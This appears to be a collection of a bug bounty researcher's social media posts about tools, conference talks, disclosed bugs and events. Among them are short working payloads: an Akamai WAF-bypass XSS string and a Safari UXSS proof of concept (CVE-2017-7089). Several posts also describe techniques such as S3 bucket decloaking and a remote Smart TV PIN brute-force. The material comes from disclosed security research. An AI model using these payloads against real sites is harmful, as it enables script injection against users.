Took more than 2 years, but just released the postMessage-tracker Chrome Extension!
Look at the functions receiving postMessages directly in the extension, look at the messages and sender/receiver window locations and track everything using a log-URL.
I decided to make a homage-post to @homakov and @Nirgoldshlager about different OAuth-token leakage methods I've been researching – ten years after their blog posts that inspired me to start hunting for bugs ♥️ thank you.
I found some permission issues when hacking Apple CloudKit. I wrote about three of them on @detectify labs, one where I accidentally deleted all shared Apple Shortcuts.
Akamai WAF bypass XSS in HTML-context when no character-filtering exists to trick it:
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
If you're testing a site that needs a unique CSRF-token for each call, you can use Hackvertor's custom tags to make a simple Python script to fetch a new token for you. Very simple solution and works very nicely. Thank you again @garethheyes!
Here are my slides from my talk at the Facebook/Google-hosted BountyCon 2019 in Singapore earlier this year:
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Ten years ago today I sent my first bug bounty report. It was to PayPal. Fascinating to see some things are very different now from then, but some things are still exactly like they were.
I have researched Oblivious DoH (ODoH) a bit and came to a few conclusions around the lack of security concerns for SSRF in the RFC. I was asked to also make a public issue about it after reporting issues in odoh-server-go made by Cloudflare.
I often export proxy items from Burp to extract certain data. Example: filter out all response headers where request param is X, get a list of all response params for custom wordlist creation etc. I built this tool to make it do what I want:
I wrote a simple reflection script which helps a lot to find script gadgets (@kkotowicz @slekies @sirdarckcat) for XSS. There are probably more advanced solutions, but it makes it a lot easier to go through large amounts of JS files to find candidates.
I can't believe it! I won the H1-514 in Montreal! But from Stockholm. During the announcements I was jumping frozen and cold on a parking lot at 3 AM screaming. It felt like I was there, and it seems I kind of was also, thanks to @jobertabma 😂 THANK YOU FOR THIS! ❤️❤️❤️ #h1514
I read the S3 docs and found that signing errors disclose the bucket name. This can be used when CDNs are put in front of a bucket. It doesn't work in all cases, but in many of them. You need an access key to make it work (no secret key).
S3 decloaker:
Safari 10 UXSS (CVE-2017-7089) found by me and @i_bo0om last year:
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.domain)">'};setTimeout(y,100)</script>
One of my "client-side race condition" bugs finally got disclosed. I'm racing by sending postMessages faster than the legit sender, and by opening a new window instead of a tab, I can keep the opener window sending the messages much faster.
Turns out my Smart TV was really into CORS. It was possible to brute-force the PIN remotely in under 2 minutes using a race condition; after that you have full control using IRCC et al.
Here's an XSS challenge taken from real life. Can you make it alert() on my origin? Send me your solution in DM. I will post a hint in this thread after the weekend. #xss #bugbounty
An easy and quick tool to search through all branches and commits of a git repo, or through all repos of a GitHub user, with a regex, written by @peterjaric
"There is no reason to do bug bounties. All bugs are already found and the competition is too hard" – said someone who should watch me and @avlidienbrunn speak at OWASP Stockholm on the 2nd of October – "Eliminating False Assumptions in Bug Bounties"
If you ever wanted a video about live hacking including @JonathanBouman smashing a sign saying NO HACKERS ALLOWED, a shuffling @avlidienbrunn and me roaring like a lion, today all your wishes came true:
Thank you @Hacker0x01 @awscloud for an amazing event ♥️
A huge number of sites are still doing this wrong, and this is such a beautiful attack. Often leads to account takeover due to CSRF-token leakage. Great job again @omer_gil!
I will be doing the keynote at the first @bsidesahmedabad ever in a few minutes! Super thankful for being invited, I hope you will enjoy! #bsidesahmedabad
Hacking into Google's Network for $133,337 🏆
It was a pleasure to talk to @epereiralopez about his bug bounty research into Google Cloud. It was really fascinating to hear about the Google internals and the crazy tricks he knew.
Electrum 3.0.4 is still vulnerable to some extent, since it allows blind posting of commands using text/plain. @taviso mentioned gui-command; I did an ugly PoC of it. Safari allows you to find ports that give errors but are still open. Wait until a proper patch is out.
I made a CLI version of the Template Generator, called bountytpl:
markdown-file + JSON = report
Can be used nicely in a pipeline with bountyplz: #bugbounty
This is neat! Chrome fetches CSS @imports before the full document is received, and by abusing output buffers you can import multiple CSS files in the same response based on the previous import and do sequential extraction of HTML attributes. Great writeup!
In Chrome, run:
data:text/html,<script>Object.getPrototypeOf=function(){return {constructor:{}}}</script>
Type anything in the console after that; the suggestion tooltip will run into an infinite recursion. #sundayfunday
Such an AWESOME event in Amsterdam. I love hanging out with all the people, talking, sharing ideas, collaborating. Congrats @MrTuxracer for the MVH, well deserved! And THANK YOU @Dropbox for being such a great and fun target, you did not make it easy for us :D Karaoke time! #h13120
On my way to #h1702 in Vegas, representing Team Sweden 🇸🇪! Also, thanks @securinti for rooting for us even back in 2015 (check the first link below). 😘
HOW TO GET STARTED IN BUG BOUNTY (9+ pro tips)
A week ago I asked the bounty community for their top 3 tips on how to get started. This is the result. Thanks to everyone who contributed, and for your awesome support! <3
Such a small little detail in the UX. It never gets any credit, but it's a great solution when scrolling through large amounts of items, not wanting to filter but still wanting to find things. I will now finally give it the recognition it deserves. Thank you @Burp_Suite